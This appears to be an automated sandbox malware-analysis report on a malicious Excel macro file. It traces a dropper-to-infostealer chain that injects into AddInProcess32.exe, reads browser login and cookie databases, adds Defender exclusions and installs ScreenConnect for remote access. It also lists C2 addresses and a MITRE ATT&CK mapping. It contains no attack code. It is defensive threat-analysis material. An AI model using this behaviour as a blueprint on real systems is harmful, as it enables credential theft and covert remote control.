                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D2B10 QueryPerformanceFrequency,GetSystemTimeAsFileTime,QueryPerformanceCounter,8_2_00007FFA208D2B10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            Source: Yara match | File source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara match | File source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                            Source: C:\Windows\System32\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                            Source: svchost.exe, 00000011.00000002.6324493131.00000167DD502000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MSASCui.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procexp.exe
                            Source: svchost.exe, 00000011.00000002.6324493131.00000167DD502000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: 0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                            Source: Yara match | File source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR

                            Remote Access Functionality

                            Source: Yara match | File source: 0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR
                            Source: Yara match | File source: 37.2.Document.exe.5790000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 46.2.ScreenConnect.WindowsClient.exe.2ebfa10.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 46.0.ScreenConnect.WindowsClient.exe.bb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 37.2.Document.exe.5790000.11.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 37.0.Document.exe.805db0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 37.0.Document.exe.7dc3d4.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 37.0.Document.exe.7563d4.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 37.0.Document.exe.740000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000025.00000002.4319151822.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000025.00000002.4300058018.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: Document.exe PID: 6848, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5704, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 8000, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4276, type: MEMORYSTR
                            Source: Yara match | File source: C:\Windows\Temp\~DFADB967A848420FAD.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                            Source: Yara match | File source: C:\Config.Msi\3dc3b5.rbs, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Temp\~DF7DD5C6CF3244B659.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Temp\~DF4BD5D31B57736E59.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Temp\~DFD7A972176369F367.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Temp\~DF43DA0E5046E12DCA.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Temp\~DF9BF6D7E97EECDDD3.TMP, type: DROPPED
                            Source: Yara match | File source: C:\Windows\Installer\MSIC5D7.tmp, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Document.exe, type: DROPPED

                            Mitre Att&ck Matrix (number in parentheses: count of matching signatures for that technique)

                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | Scripting (52) | Replication Through Removable Media (1) | Windows Management Instrumentation (131) | Scripting (52) | DLL Side-Loading (1) | Disable or Modify Tools (41) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | Native API (11) | DLL Side-Loading (1) | Component Object Model Hijacking (1) | Deobfuscate/Decode Files or Information (11) | Input Capture (111) | Peripheral Device Discovery (11) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Component Object Model Hijacking (1) | Access Token Manipulation (1) | Obfuscated Files or Information (331) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Input Capture (111) | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (1) | Windows Service (2) | Windows Service (2) | Software Packing (1) | NTDS | System Information Discovery (57) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | Scheduled Task/Job (2) | Browser Extensions (1) | Process Injection (312) | DLL Side-Loading (1) | LSA Secrets | Security Software Discovery (271) | SSH | Keylogging | Application Layer Protocol (14) | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | PowerShell (2) | Scheduled Task/Job (2) | Scheduled Task/Job (2) | File Deletion (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Registry Run Keys / Startup Folder (1) | Registry Run Keys / Startup Folder (1) | Masquerading (22) | DCSync | Virtualization/Sandbox Evasion (181) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Modify Registry (1) | Proc Filesystem | Application Window Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Virtualization/Sandbox Evasion (181) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Access Token Manipulation (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Process Injection (312) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                            Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Hidden Users (1) | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
                            Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | Regsvr32 (1) | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
                            Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | Rundll32 (1) | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            Behavior Graph ID: 1637073
                            Sample: Document25.xlsm
                            Startdate: 13/03/2025
                            Architecture: WINDOWS
                            Score: 100

                            Document25.xlsm (start)
                              DNS/IP: www-msn-com.a-0003.a-msedge.net; star-azurefd-prod.trafficmanager.net; 32 other IPs or domains
                              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 23 other signatures
                              Started: EXCEL.EXE (269 63); msiexec.exe; ScreenConnect.ClientService.exe; 14 other processes

                              EXCEL.EXE (269 63)
                                DNS/IP: f005.backblazeb2.com 149.137.136.16, 443, 49693 ZOOM-VIDEO-COMM-ASUS United States; s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49705, 49707 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
                                Dropped: C:\Users\user\AppData\Local\...\newpoveno.zip (Zip); C:\Users\user\AppData\...\invoice_log.txt (ASCII)
                                Signatures: Office process queries suspicious COM object (likely to drop second stage)
                                Started: newpoveno.exe (1 8); 7z.exe (6); regsvr32.exe

                                newpoveno.exe (1 8)
                                  Dropped: C:\Users\user\SystemRootDoc\newpoveno.exe (PE32+); C:\Users\user\...\nasrallah_x86.dll (data); C:\Users\user\SystemRootDoc\msvcp290.dll (PE32+); C:\Users\user\SystemRootDoc\libcares-2.dll (PE32+)
                                  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
                                  Started: AddInProcess32.exe; powershell.exe (23); conhost.exe

                                  AddInProcess32.exe
                                    DNS/IP: 176.65.142.74, 4448, 4449, 49700 WEBTRAFFICDE Germany
                                    Dropped: C:\Users\user\AppData\Local\...\Document.exe (PE32)
                                    Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Writes to foreign memory regions; Injects a PE file into a foreign processes
                                    Started: cmd.exe; cvtres.exe; explorer.exe

                                    cmd.exe
                                      Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
                                      Started: powershell.exe; conhost.exe

                                      powershell.exe
                                        Started: Document.exe

                                        Document.exe
                                          Signatures: Contains functionality to hide user accounts
                                          Started: msiexec.exe

                                          msiexec.exe
                                            Dropped: C:\Users\user\AppData\Local\...\MSIBE65.tmp (PE32)

                                    cvtres.exe
                                      DNS/IP: ipinfo.io 34.117.59.81 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States
                                      Started: chrome.exe; conhost.exe

                                      chrome.exe
                                        DNS/IP: 192.168.2.9, 443, 4448, 4449 unknown unknown; 192.168.2.23 unknown unknown; 192.168.2.4 unknown unknown
                                        Started: chrome.exe

                                        chrome.exe
                                          DNS/IP: www.google.com 142.250.185.132 GOOGLEUS United States; play.google.com 142.250.185.142 GOOGLEUS United States; 7 other IPs or domains

                                  powershell.exe (23)
                                    Signatures: Loading BitLocker PowerShell Module
                                    Started: conhost.exe; WmiPrvSE.exe

                                7z.exe (6)
                                  Dropped: C:\Users\user\AppData\Local\...\newpoveno.exe (PE32+); C:\Users\user\AppData\...\vcruntime210.dll (data); C:\Users\user\AppData\...\nasrallah_x86.dll (data); 2 other files (none is malicious)
                                  Started: conhost.exe

                              msiexec.exe
                                Dropped: ScreenConnect.Wind...dentialProvider.dll (PE32+); C:\...\ScreenConnect.ClientService.exe (PE32); C:\Windows\Installer\MSICABB.tmp (PE32); 9 other files (none is malicious)
                                Signatures: Enables network access during safeboot for specific services; Modifies security policies related information
                                Started: msiexec.exe; 2 other processes

                                msiexec.exe
                                  Started: rundll32.exe

                                  rundll32.exe
                                    Dropped: C:\Users\user\...\ScreenConnect.Windows.dll (PE32); C:\...\ScreenConnect.InstallerActions.dll (PE32); C:\Users\user\...\ScreenConnect.Core.dll (PE32); 4 other files (none is malicious)
                                    Signatures: Contains functionality to hide user accounts

                              ScreenConnect.ClientService.exe
                                DNS/IP: server-ovh1025800-relay.screenconnect.com 15.204.12.5 HP-INTERNET-ASUS United States
                                Signatures: Contains functionality to hide user accounts; Reads the Security eventlog; Reads the System eventlog
                                Started: ScreenConnect.WindowsClient.exe

                                ScreenConnect.WindowsClient.exe
                                  Signatures: Contains functionality to hide user accounts

                              14 other processes
                                DNS/IP: 127.0.0.1 unknown unknown
                                Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                                Started: newpoveno.exe; newpoveno.exe; 3 other processes

                                newpoveno.exe
                                  Signatures: Injects a PE file into a foreign processes
                                  Started: conhost.exe; AddInProcess32.exe

                                newpoveno.exe
                                  Started: 2 other processes

                                3 other processes
                                  Started: conhost.exe

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.